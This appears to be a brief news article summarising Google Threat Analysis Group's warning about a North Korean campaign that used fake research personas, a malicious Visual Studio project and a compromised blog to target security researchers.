In a blog post published today, Threat Analysis Group – Google’s security research arm – warned of a new type of socially-engineered campaign targeting security researchers.
Over the past several months, the Threat Analysis Group writes, they have been observing a new type of campaign targeting security researchers involved in vulnerability research and development at various companies and organizations.
They attribute this campaign to a government-backed entity based in North Korea.
The threat actors had a blog and multiple Twitter profiles they used to build credibility and interact with potential targets.
They went to great lengths to make them look legitimate. Their blog even contains quest posts by legitimate security researchers.
IN the blog post, TAP researchers warn about a novel social engineering method the cybercriminals used in these attacks. They established initial contact on social media, then they would ask the targeted researchers if they wanted to collaborate on vulnerability research. And then they would invite the researcher into a Visual Studio Project. The project contained a malicious source code and a DLL malware that would immediately start communicating with C2 domains of the spies.
The researchers have also been compromised after visiting the actors’ blog if they followed opened a Twitter link to a post hosted on blog.br0vvnn[.]io. A malicious code would then be installed on the researcher’s system, and an in-memory backdoor would start communicating with the attackers’ command and control server. Important to mention that the victim systems were running up-to-date Windows 10 and Chrome browser.
This an ongoing investigation. And TAP researchers encourage anyone who discovers a Chrome vulnerability to report that activity via the Chrome VRP.
The TAG researchers also remind the security research community that they are targets to government-backed attackers and must remain vigilant when engaging with individuals they have not previously interacted with.